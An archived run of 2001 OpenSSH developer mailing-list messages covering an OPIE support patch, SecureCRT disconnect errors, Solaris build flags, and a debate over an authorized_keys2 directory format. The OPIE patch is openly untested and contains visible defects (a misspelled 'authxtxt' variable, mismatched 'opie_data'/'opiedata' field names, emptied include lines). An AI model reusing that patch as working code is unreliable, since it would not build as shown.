session_close_by_channel: channel 0 kill 11786 debug1: Received SIGCHLD. debug3: tvp!=NULL kid 1 mili 100 debug1: session_by_pid: pid 11786 debug1: session_pty_cleanup: session 0 release /dev/pts/2 debug1: session_free: session 0 pid 11786 Connection closed by remote host. Closing connection to 137.79.89.118 From wichert at cistron.nl Mon Jun 4 02:50:02 2001 From: wichert at cistron.nl (Wichert Akkerman) Date: Sun, 3 Jun 2001 18:50:02 +0200 Subject: OPIE support patch Message-ID: <20010603185002.C13880@cistron.nl> I just cobbled up a little patch to add support for OPIE to OpenSSH. Currently untested, but feedback is welcome. Wichert. -- _________________________________________________________________ / Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | -------------- next part -------------- diff -wur org/openssh-2.5.2p2/ChangeLog openssh-2.5.2p2/ChangeLog --- org/openssh-2.5.2p2/ChangeLog Thu Mar 22 06:04:12 2001 +++ openssh-2.5.2p2/ChangeLog Sun Jun 3 18:37:17 2001 @@ -1,3 +1,6 @@ +20010603 + - (wta) Add OPIE support + 20010322 - (djm) Better AIX no tty fix, spotted by Gert Doering - (djm) Released 2.5.2p2 diff -wur org/openssh-2.5.2p2/acconfig.h openssh-2.5.2p2/acconfig.h --- org/openssh-2.5.2p2/acconfig.h Sat Mar 17 02:15:38 2001 +++ openssh-2.5.2p2/acconfig.h Sun Jun 3 18:36:47 2001 @@ -184,6 +184,9 @@ /* Define if you want AFS support */ #undef AFS +/* Define if you want OPIE support */ +#undef OPIE + /* Define if you want S/Key support */ #undef SKEY diff -wur org/openssh-2.5.2p2/auth-chall.c openssh-2.5.2p2/auth-chall.c --- org/openssh-2.5.2p2/auth-chall.c Mon Mar 5 07:59:27 2001 +++ openssh-2.5.2p2/auth-chall.c Sun Jun 3 18:34:43 2001 @@ -67,7 +67,7 @@ debug("verify_response: <%s> = <%d>", response, authok); return authok != 0; } -#else +#else /* BSD_AUTH */ #ifdef SKEY #include @@ -88,6 +88,25 @@ skey_haskey(authctxt->pw->pw_name) == 0 && skey_passcheck(authctxt->pw->pw_name, response) != -1); } +#else /* SKEY */ +#ifdef OPIE +#include + +char * +get_challenge(Authctxt *authctxt, char *devs) +{ + static char challenge[OPIE_CHALLENGE_MAX+64]; + if (opiechallenge(&authctxt->opie_data, authxtxt->user, challenge) != 0) + return NULL; + strlcat(challenge, "\nOPIE Password: ", sizeof challenge); + return challenge; +} +int +verify_response(Authctxt *authctxt, char *response) +{ + return authctxt->valid && opieverify(&authctxt->opie_data, response); +} + #else /* not available */ char * @@ -100,5 +119,5 @@ { return 0; } -#endif -#endif +#endif /* !SKEY */ +#endif /* !BSD_AUTH */ diff -wur org/openssh-2.5.2p2/auth.h openssh-2.5.2p2/auth.h --- org/openssh-2.5.2p2/auth.h Mon Mar 5 06:56:41 2001 +++ openssh-2.5.2p2/auth.h Sun Jun 3 18:27:18 2001 @@ -35,6 +35,10 @@ #include #endif +#ifdef OPIE +#include +#endif + typedef struct Authctxt Authctxt; struct Authctxt { int success; @@ -48,6 +52,9 @@ char *style; #ifdef BSD_AUTH auth_session_t *as; +#endif +#ifdef OPIE + struct opie opiedata; #endif }; diff -wur org/openssh-2.5.2p2/configure.in openssh-2.5.2p2/configure.in --- org/openssh-2.5.2p2/configure.in Mon Mar 19 00:09:28 2001 +++ openssh-2.5.2p2/configure.in Sun Jun 3 18:36:22 2001 @@ -473,6 +473,31 @@ ) LIBS="$LIBS $KLIBS" +# Check whether user wants OPIE support +OPIE_MSG="no" +AC_ARG_WITH(opie, + [ --with-opie=PATH Enable OPIE support], + [ + if test "x$withval" != "xno" ; then + + if test "x$withval" != "xyes" ; then + CPPFLAGS="$CPPFLAGS -I${withval}/include" + LDFLAGS="$LDFLAGS -L${withval}/lib" + fi + + AC_DEFINE(OPIE) + LIBS="-lopie $LIBS" + OPIE_MSG="yes" + + AC_CHECK_FUNC(opiechallenge, + [], + [ + AC_MSG_ERROR([** Incomplete or missing OPIE libraries.]) + ]) + fi + ] +) + # Check whether user wants S/Key support SKEY_MSG="no" AC_ARG_WITH(skey, From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 05:35:24 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 3 Jun 2001 21:35:24 +0200 Subject: another bug report In-Reply-To: ; from mugz@x-mafia.org on Sun, Jun 03, 2001 at 12:31:48PM -0400 References: <20010602102854.F14694@folly> Message-ID: <20010603213523.A4471@folly> On Sun, Jun 03, 2001 at 12:31:48PM -0400, mugz wrote: > > OK, I know some mailing lists dont like attachments, so I did as you asked > and have pasted the log to the end of this message. It is the log of a > user logging in with secureCRT and using the "disconnect" button to exit > the shell: i don't see an error message in the log file. From raj at cerias.purdue.edu Mon Jun 4 05:42:13 2001 From: raj at cerias.purdue.edu (Brian Poole) Date: Sun, 3 Jun 2001 14:42:13 -0500 Subject: Handling of password & account expirations Message-ID: <20010603144212.A9405@basm.cerias.purdue.edu> Blarg, this should have gone to the list, not to Markus direct. ----- Forwarded message from Brian Poole ----- Date: Sun, 3 Jun 2001 14:40:22 -0500 From: Brian Poole To: Markus Friedl Subject: Re: Handling of password & account expirations Quoting Markus Friedl (markus.friedl at informatik.uni-erlangen.de) from 3 June 2001: > % however, in the future openbsd will move to BSD_AUTH, so > % perhaps this feature will be supported on openbsd. > > and indeed, this is handled by auth_approval in session.c > if BSD_AUTH is defined. Sorry, it seemed a little nebulous of a response. You did reply though and I'll apologize for saying that no one had replied. I've personally been unable to find more information on BSD_AUTH so I can't say I'm well educated on how it works. I'm very glad that it closes this door on OpenBSD. While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I believe this is still an issue with OpenSSH in the portable release, correct? We can't expect {Linux,Solaris,} to have BSD_AUTH can we? Your response is appreciated, -b ----- End forwarded message ----- From rob at hagopian.net Mon Jun 4 07:08:15 2001 From: rob at hagopian.net (Rob Hagopian) Date: Sun, 3 Jun 2001 17:08:15 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010603114604.B24416@folly> Message-ID: My $0.02 is that I like it, and I find it easier to keep track of the keys and where they came from by having a directory format... could we at least put the patch in contrib? -Rob On Sun, 3 Jun 2001, Markus Friedl wrote: > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > > Root would not be the only one to profit from this; you would only need to > > copy the pubkey file in the right dir (with a descriptive name if you > > like!), and authorization would work without file editing. Also, if you > > need to refresh just one key, you could just scp that one over, no need > > to edit the file either. > > i don't understand why editing a file is hard. > i think keeping a file in sync is simpler than > syncing directories, especially deleting files. > > > What do you think -- would this be useful? Bloat? Could it be considered > > to be merged if it was implemented? > > i don't think it's useful. ssh.com switched to a-key-per-file, > but openssh and the traditional ssh use a-key-per-line > > and i don't want to support 2 different ways of doing things. > > > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not > > print debug message: > > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 > > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 > > @@ -26,6 +28,8 @@ > > if (!f) { > > /* Restore the privileged uid. */ > > restore_uid(); > > + packet_send_debug("Could not open %.900s for reading.", file); > > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); > > return 0; > > } > > if (options.strict_modes) { > > > > was this left out by design, or a leftover in auth-rsa.c ? > > they should be merged, and in the future, i don't > want to see debug messages before a user is authenticated. > From jmknoble at jmknoble.cx Mon Jun 4 07:27:48 2001 From: jmknoble at jmknoble.cx (Jim Knoble) Date: Sun, 3 Jun 2001 16:27:48 -0500 Subject: Possible bug in openssh configuration file In-Reply-To: <3B160B15.8DC80CC2@obs.unige.ch>; from Alain.Aubord@obs.unige.ch on Thu, May 31, 2001 at 11:12:53AM +0200 References: <3B160B15.8DC80CC2@obs.unige.ch> Message-ID: <20010603162748.A11088@zax.half.pint-stowp.cx> Circa 2001-May-31 11:12:53 +0200 dixit Alain Aubord: : Dear Sirs, : I was trying to compile openssh for Solaris 2.8 in 64bits mode. : For that, I have defined the variable CFLAGS with the following value : "-fast -I/isdc/include -L/isdc/lib -xtarget=ultra -xarch=v9" before : running the configure command. Some of those options shouldn't be in CFLAGS; they should be in LDFLAGS. I don't know which compiler you're using (doesn't look like gcc), but probably you mean: CFLAGS="-fast -I/isdc/include -xtarget=ultra -xarch=v9" \ LDFLAGS="-fast -L/isdc/lib -xtarget=ultra -xarch=v9" \ ./configure --prefix=... : All goes correctly except that the command for doing the link of : executable is not called with the content of variable "CFLAGS" (as you : can see in the following extract of compile log). This is annoying since : the linking can not be done (without correct parameter, 32bits linking : is done). The solution I have used is to do the link manually with the : content of the variable CFLAGS and that has worked. But I have spent : some time to find that. You need to use LDFLAGS for link-time options; CFLAGS is for compile-time options (and CPPFLAGS is often used for preprocessor-time options, such as -I or -D). -- jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/ (GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 249 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010603/2aed611e/attachment.bin From jmknoble at jmknoble.cx Mon Jun 4 07:43:58 2001 From: jmknoble at jmknoble.cx (Jim Knoble) Date: Sun, 3 Jun 2001 16:43:58 -0500 Subject: authorized_keys2 directory idea In-Reply-To: <20010603114604.B24416@folly>; from markus.friedl@informatik.uni-erlangen.de on Sun, Jun 03, 2001 at 11:46:04AM +0200 References: <20010603114604.B24416@folly> Message-ID: <20010603164358.B11088@zax.half.pint-stowp.cx> Circa 2001-Jun-03 11:46:04 +0200 dixit Markus Friedl: : i don't understand why editing a file is hard. Editing a file is hard for many inexperienced users. Especially a file that contains very long lines filled with what appears to meaningless random letters and numbers. Using a directory format has the potential to make it significantly easier for users to install public keys onto a remote system. Instead of having to use a complicated set of shell commands such as: cat ~/.ssh/identity.pub |ssh remote-host 'cat >>~/.ssh/authorized_keys2' (remember that ssh-copy-id only works for rsa1 keys), you can simply do: scp -p ~/.ssh/identity.pub remote-host:.ssh/authorized_keys2.d/local-host Once they understand scp, inexperienced users can easily manage their own public keys. That's a big win for everyone. : i think keeping a file in sync is simpler than syncing directories, : especially deleting files. Heard of rsync? All you need is: rsync -av --delete master-key-repository/* \ user at remote-host:.ssh/authorized_keys2.d/ Alternatively: ssh remote-host 'cd .ssh/authorized_keys2.d; cvs update' The file-based format could even stay there without a problem: Simple read ~/.ssh/authorized_keys2 first, then look for ~/.ssh/authorized_keys2.d/* and read them. Existing practice doesn't have to change. [Pekka Savola wrote:] : > What do you think -- would this be useful? Bloat? Could it be considered : > to be merged if it was implemented? : : i don't think it's useful. ssh.com switched to a-key-per-file, : but openssh and the traditional ssh use a-key-per-line Myself, i think it's a fantastic idea. Both experienced and inexperienced users stand to benefit. -- jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/ (GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 249 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010603/eb971a1d/attachment.bin From pekkas at netcore.fi Mon Jun 4 07:52:50 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 4 Jun 2001 00:52:50 +0300 (EEST) Subject: authorized_keys2 directory idea In-Reply-To: <20010603114604.B24416@folly> Message-ID: On Sun, 3 Jun 2001, Markus Friedl wrote: > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > > Root would not be the only one to profit from this; you would only need to > > copy the pubkey file in the right dir (with a descriptive name if you > > like!), and authorization would work without file editing. Also, if you > > need to refresh just one key, you could just scp that one over, no need > > to edit the file either. > > i don't understand why editing a file is hard. > i think keeping a file in sync is simpler than > syncing directories, especially deleting files. Yes, keeping a file 100% in sync is way easier. But in real situations, you're often faced by the fact that e.g. 60-90% of the keys are the same, and the rest vary. Then syncing is a bit more difficult. Editing is also a bigger (ie: interactive) process when it has to be done on many hosts. A problem is backup files if you edit keys with an editor, ie. ones ending to e.g. ~ or # (depending on the editor). Then if you just delete the base key, the results might be unexpected. To counter this, filenames would be scanned and only those that contain only legal characters would pass. > > What do you think -- would this be useful? Bloat? Could it be considered > > to be merged if it was implemented? > > i don't think it's useful. ssh.com switched to a-key-per-file, > but openssh and the traditional ssh use a-key-per-line I wasn't aware ssh.com is doing something like this too. So it might be something to be done sooner or later, though. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From pekkas at netcore.fi Mon Jun 4 07:57:13 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Mon, 4 Jun 2001 00:57:13 +0300 (EEST) Subject: authorized_keys2 directory idea In-Reply-To: <20010603164358.B11088@zax.half.pint-stowp.cx> Message-ID: On Sun, 3 Jun 2001, Jim Knoble wrote: > Circa 2001-Jun-03 11:46:04 +0200 dixit Markus Friedl: > > : i don't understand why editing a file is hard. > > Editing a file is hard for many inexperienced users. Especially a file > that contains very long lines filled with what appears to meaningless > random letters and numbers. > > Using a directory format has the potential to make it significantly > easier for users to install public keys onto a remote system. Instead > of having to use a complicated set of shell commands such as: > > cat ~/.ssh/identity.pub |ssh remote-host 'cat >>~/.ssh/authorized_keys2' And there is another complication here (which often goes wrong with novice users): the file's permissions usually go wrong due to common non-strict umask when the file is being created. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From drosih at rpi.edu Mon Jun 4 08:26:41 2001 From: drosih at rpi.edu (Garance A Drosihn) Date: Sun, 3 Jun 2001 18:26:41 -0400 Subject: authorized_keys2 directory idea In-Reply-To: References: Message-ID: At 5:08 PM -0400 6/3/01, Rob Hagopian wrote: >My $0.02 is that I like it, and I find it easier to keep >track of the keys and where they came from by having a >directory format... could we at least put the patch in >contrib? I'll add another $0.02 to say that I think it is useful to allow for a directory of public keys instead of a single file. If done, I might also suggest that ssh ignore all files in that directory except for those which end in '.pub', just to make it clear that the file should be the "public key" and not the private one. -- Garance Alistair Drosehn = gad at eclipse.acs.rpi.edu Senior Systems Programmer or gad at freebsd.org Rensselaer Polytechnic Institute or drosih at rpi.edu From mugz at x-mafia.org Mon Jun 4 12:03:53 2001 From: mugz at x-mafia.org (mugz) Date: Sun, 3 Jun 2001 22:03:53 -0400 (EDT) Subject: another bug report In-Reply-To: <20010603213523.A4471@folly> Message-ID: On Sun, 3 Jun 2001, Markus Friedl wrote: > On Sun, Jun 03, 2001 at 12:31:48PM -0400, mugz wrote: > > > > OK, I know some mailing lists dont like attachments, so I did as you asked > > and have pasted the log to the end of this message. It is the log of a > > user logging in with secureCRT and using the "disconnect" button to exit > > the shell: > > i don't see an error message in the log file. > Well, I still get alot of these in the log, and without exception, its people useing secureCRT and the "disconnect" button: Jun 3 18:46:30 members sshd[14688]: error: session_close_by_channel: kill 14689: Operation not permitted Jun 3 18:46:30 members sshd[14688]: error: session_close_by_channel: kill 14689: Operation not permitted It must be something that only occurs when sshd is in daemon mode? mugz From deraadt at cvs.openbsd.org Mon Jun 4 13:29:05 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Sun, 03 Jun 2001 21:29:05 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Sun, 03 Jun 2001 17:08:15 EDT." Message-ID: <200106040329.f543T5n24299@cvs.openbsd.org> Incompatibility sucks. OpenSSH is security software. A lot of you keep asking for more and more features, and the code keeps growing and growing and growing. Assuming that the number of lines per bug is a constant, how long before one of these features which noone uses becomes a hole? I think it is ridiculous how some people keep demanding change. Sorry, but I firmly believe that change for the sake of "I like it" is stupid. > My $0.02 is that I like it, and I find it easier to keep track of the keys > and where they came from by having a directory format... could we at least > put the patch in contrib? > -Rob > > On Sun, 3 Jun 2001, Markus Friedl wrote: > > > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > > > Root would not be the only one to profit from this; you would only need to > > > copy the pubkey file in the right dir (with a descriptive name if you > > > like!), and authorization would work without file editing. Also, if you > > > need to refresh just one key, you could just scp that one over, no need > > > to edit the file either. > > > > i don't understand why editing a file is hard. > > i think keeping a file in sync is simpler than > > syncing directories, especially deleting files. > > > > > What do you think -- would this be useful? Bloat? Could it be considered > > > to be merged if it was implemented? > > > > i don't think it's useful. ssh.com switched to a-key-per-file, > > but openssh and the traditional ssh use a-key-per-line > > > > and i don't want to support 2 different ways of doing things. > > > > > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not > > > print debug message: > > > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 > > > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 > > > @@ -26,6 +28,8 @@ > > > if (!f) { > > > /* Restore the privileged uid. */ > > > restore_uid(); > > > + packet_send_debug("Could not open %.900s for reading.", file); > > > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); > > > return 0; > > > } > > > if (options.strict_modes) { > > > > > > was this left out by design, or a leftover in auth-rsa.c ? > > > > they should be merged, and in the future, i don't > > want to see debug messages before a user is authenticated. > > > From rob at hagopian.net Mon Jun 4 14:12:52 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 00:12:52 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: OpenSSH changed from the ssh.com directory method... not that that's always a bad thing, I prefer not having a separate .ssh2 directory. But a lot of other unix utils have moved to file based rather than line based config methods for the simple reason that a lot of people working with these systems find it easier to manage them this way... Do you object to /proc, pam, and SysV rc scripts as well? And I still think that if people support it, it surely belongs in contrib for people to use at their own risk... what else is that for? -Rob On Sun, 3 Jun 2001, Theo de Raadt wrote: > Incompatibility sucks. > > OpenSSH is security software. A lot of you keep asking for more and > more features, and the code keeps growing and growing and growing. > Assuming that the number of lines per bug is a constant, how long > before one of these features which noone uses becomes a hole? > > I think it is ridiculous how some people keep demanding change. > > Sorry, but I firmly believe that change for the sake of "I like it" is > stupid. > > > My $0.02 is that I like it, and I find it easier to keep track of the keys > > and where they came from by having a directory format... could we at least > > put the patch in contrib? > > -Rob > > > > On Sun, 3 Jun 2001, Markus Friedl wrote: > > > > > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > > > > Root would not be the only one to profit from this; you would only need to > > > > copy the pubkey file in the right dir (with a descriptive name if you > > > > like!), and authorization would work without file editing. Also, if you > > > > need to refresh just one key, you could just scp that one over, no need > > > > to edit the file either. > > > > > > i don't understand why editing a file is hard. > > > i think keeping a file in sync is simpler than > > > syncing directories, especially deleting files. > > > > > > > What do you think -- would this be useful? Bloat? Could it be considered > > > > to be merged if it was implemented? > > > > > > i don't think it's useful. ssh.com switched to a-key-per-file, > > > but openssh and the traditional ssh use a-key-per-line > > > > > > and i don't want to support 2 different ways of doing things. > > > > > > > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not > > > > print debug message: > > > > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 > > > > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 > > > > @@ -26,6 +28,8 @@ > > > > if (!f) { > > > > /* Restore the privileged uid. */ > > > > restore_uid(); > > > > + packet_send_debug("Could not open %.900s for reading.", file); > > > > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); > > > > return 0; > > > > } > > > > if (options.strict_modes) { > > > > > > > > was this left out by design, or a leftover in auth-rsa.c ? > > > > > > they should be merged, and in the future, i don't > > > want to see debug messages before a user is authenticated. > > > > > > From deraadt at cvs.openbsd.org Mon Jun 4 14:25:28 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Sun, 03 Jun 2001 22:25:28 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 00:12:52 EDT." Message-ID: <200106040425.f544PSn29474@cvs.openbsd.org> > OpenSSH changed from the ssh.com directory method... You don't know your history. From mouring at etoh.eviladmin.org Mon Jun 4 14:13:23 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 3 Jun 2001 23:13:23 -0500 (CDT) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Mon, 4 Jun 2001, Rob Hagopian wrote: > OpenSSH changed from the ssh.com directory method... not that that's > always a bad thing, I prefer not having a separate .ssh2 directory. But a > lot of other unix utils have moved to file based rather than line based No.. We did not. ssh.com decided not to use their old single file authorized_keys. As for which we should follow. I personally don't care. It's no harder to me to manage it as a single file or as multiple little files. And the arguments I've seen really does not improve the odds of us changing it. > config methods for the simple reason that a lot of people working with > these systems find it easier to manage them this way... Do you object to > /proc, pam, and SysV rc scripts as well? > I have a massive objection to /proc and a less extent pam.. But that is here nor there. =) > And I still think that if people support it, it surely belongs in contrib > for people to use at their own risk... what else is that for? > -Rob > I doubt Theo ever has had problems with contrib/ code. It's core software that we are refering to. - Ben From rob at hagopian.net Mon Jun 4 14:34:18 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 00:34:18 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote: > On Mon, 4 Jun 2001, Rob Hagopian wrote: > > > OpenSSH changed from the ssh.com directory method... not that that's > > always a bad thing, I prefer not having a separate .ssh2 directory. But a > > lot of other unix utils have moved to file based rather than line based > > No.. We did not. ssh.com decided not to use their old single file > authorized_keys. As for which we should follow. I personally don't care. > It's no harder to me to manage it as a single file or as multiple little > files. And the arguments I've seen really does not improve the odds of us > changing it. But ssh.com v2 was around before OpenSSH... they fixed a lot of things from v1 to v2, I liked that one and was disappointed to see openssh revert back... > > And I still think that if people support it, it surely belongs in contrib > > for people to use at their own risk... what else is that for? > > -Rob > > > > I doubt Theo ever has had problems with contrib/ code. It's core > software that we are refering to. My suggestion was only to put it into /contrib... is that OK then? -Rob From deraadt at cvs.openbsd.org Mon Jun 4 14:37:33 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Sun, 03 Jun 2001 22:37:33 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 00:34:18 EDT." Message-ID: <200106040437.f544bXn04870@cvs.openbsd.org> > On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote: > > > On Mon, 4 Jun 2001, Rob Hagopian wrote: > > > > > OpenSSH changed from the ssh.com directory method... not that that's > > > always a bad thing, I prefer not having a separate .ssh2 directory. But a > > > lot of other unix utils have moved to file based rather than line based > > > > No.. We did not. ssh.com decided not to use their old single file > > authorized_keys. As for which we should follow. I personally don't care. > > It's no harder to me to manage it as a single file or as multiple little > > files. And the arguments I've seen really does not improve the odds of us > > changing it. > > But ssh.com v2 was around before OpenSSH... they fixed a lot of things > from v1 to v2, I liked that one and was disappointed to see openssh revert > back... We did not revert back. And just because they made a decision does not make it the right choice automatically. From deraadt at cvs.openbsd.org Mon Jun 4 14:38:23 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Sun, 03 Jun 2001 22:38:23 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 00:34:18 EDT." Message-ID: <200106040438.f544cNn25533@cvs.openbsd.org> > My suggestion was only to put it into /contrib... is that OK then? Oh, that's a great idea. And after a while, we'll have hundreds of incompatible versions for Markus to debug when you guys send in incomplete bug reports. From deraadt at cvs.openbsd.org Mon Jun 4 14:44:39 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Sun, 03 Jun 2001 22:44:39 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Sun, 03 Jun 2001 22:38:23 MDT." <200106040438.f544cNn25533@cvs.openbsd.org> Message-ID: <200106040444.f544idn21197@cvs.openbsd.org> > > My suggestion was only to put it into /contrib... is that OK then? > > Oh, that's a great idea. And after a while, we'll have hundreds of > incompatible versions for Markus to debug when you guys send in > incomplete bug reports. I want you all to think about this carefully. We make our software completely free so that you guys can tweak it. All you want. But in our own distribution, it's kind of scary when lots of tweaks happen. It can impact developer effort VERY SIGNIFICANTLY when people run local modifications. A Linux vendor shipped with ssh with modifications that broke interop with various older ones. It took effort to figure out what was going on. It took effort to convince them to alert their user base. It wasted time. I firmly believe that contrib directories do too. For years I have been saying that "buttons are bad"... From rob at hagopian.net Mon Jun 4 14:50:51 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 00:50:51 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <200106040438.f544cNn25533@cvs.openbsd.org> Message-ID: There is a whopping one patch (chroot.diff) in contrib that is not system specific; I think we're a far cry from hundreds. If people want the feature and a patch is circulated, people may apply it and never even mention it. Patches accepted for contrib could be forced to add a tag to the version line (similar to apache modules) so a developer knows exactly what they're up against if someone reports bugs. (I could even forsee a flag in config to reject connections to/from patched ssh distributions for the really paranoid...) Would that aliviate some of your concern? -Rob On Sun, 3 Jun 2001, Theo de Raadt wrote: > > My suggestion was only to put it into /contrib... is that OK then? > > Oh, that's a great idea. And after a while, we'll have hundreds of > incompatible versions for Markus to debug when you guys send in > incomplete bug reports. > From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 18:13:56 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 10:13:56 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:12:52AM -0400 References: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: <20010604101356.A29589@folly> On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote: > OpenSSH changed from the ssh.com directory method... wrong. > not that that's > always a bad thing, I prefer not having a separate .ssh2 directory. they switched, not we. > But a > lot of other unix utils have moved to file based rather than line based > config methods for the simple reason that a lot of people working with > these systems find it easier to manage them this way... Do you object to > /proc, pam, and SysV rc scripts as well? yes :) > And I still think that if people support it, it surely belongs in contrib > for people to use at their own risk... what else is that for? you have to maintain things in contrib as well, and if we ship hundreds of contrib patches it's hard to say this and that is openssh's behaviour. -m From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 18:20:59 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 10:20:59 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:34:18AM -0400 References: Message-ID: <20010604102059.B29589@folly> On Mon, Jun 04, 2001 at 12:34:18AM -0400, Rob Hagopian wrote: > On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote: > > > On Mon, 4 Jun 2001, Rob Hagopian wrote: > > > > > OpenSSH changed from the ssh.com directory method... not that that's > > > always a bad thing, I prefer not having a separate .ssh2 directory. But a > > > lot of other unix utils have moved to file based rather than line based > > > > No.. We did not. ssh.com decided not to use their old single file > > authorized_keys. As for which we should follow. I personally don't care. > > It's no harder to me to manage it as a single file or as multiple little > > files. And the arguments I've seen really does not improve the odds of us > > changing it. > > But ssh.com v2 was around before OpenSSH... they fixed a lot of things > from v1 to v2, I liked that one and was disappointed to see openssh revert > back... i did not revert from their version. openssh is based on 1.2.12 and we improved 1.2.12. i never touched ssh.com's v2, because it's not free software. many people refused to switch to ssh.com's v2, not only because of the restrictive licence, but because all the configuration changed. remember, most of the ssh users are still v1 users. i'm not going to do this. and i won't support 10 different ways of specifying keys. this is openssh and not perl. moreover, i don't see much benefit for directories over files. > My suggestion was only to put it into /contrib... is that OK then? depends on the size of the patch. but if we have it in contrib, then ppl will start to expect this from core-openssh. -m From jason at shalott.net Mon Jun 4 18:23:15 2001 From: jason at shalott.net (Jason Stone) Date: Mon, 4 Jun 2001 01:23:15 -0700 (PDT) Subject: authorized_keys2 directory idea In-Reply-To: <200106040329.f543T5n24299@cvs.openbsd.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Incompatibility sucks. > > OpenSSH is security software. A lot of you keep asking for more and > more features, and the code keeps growing and growing and growing. > Assuming that the number of lines per bug is a constant, how long > before one of these features which noone uses becomes a hole? > > I think it is ridiculous how some people keep demanding change. > > Sorry, but I firmly believe that change for the sake of "I like it" is > stupid. I agree. However, taking such a stand brings with it a risk of psuedo-forking. You say you won't take this patch because the feature is unnecesary bloat. The patch writer says okay, and just rolls it in himself on all his boxes. He also posts it on his website, and all the other people who liked the idea download it and roll it into their local installations. Now bug reports start coming in, and incompatibilities start creeping in, and if neither the bug reporter nor the developers realize that the version in question has such an "un-authorized" patch, confusion will result. How many patches are already in this state? SecurID? SRP? Some sftp chroot thing? Others? Again, I don't disagree with your statement, but the resultant risk should also be considered. -Jason -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE7G0V2swXMWWtptckRAvbrAJ4lST/reVBwdWFnUzWkPy/MiImmZACgxys3 BcDSNhpiXsSlSvjBx6TjS7M= =BdQE -----END PGP SIGNATURE----- From deraadt at cvs.openbsd.org Mon Jun 4 18:28:57 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Mon, 04 Jun 2001 02:28:57 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 01:23:15 PDT." Message-ID: <200106040828.f548SvV20544@cvs.openbsd.org> > I agree. However, taking such a stand 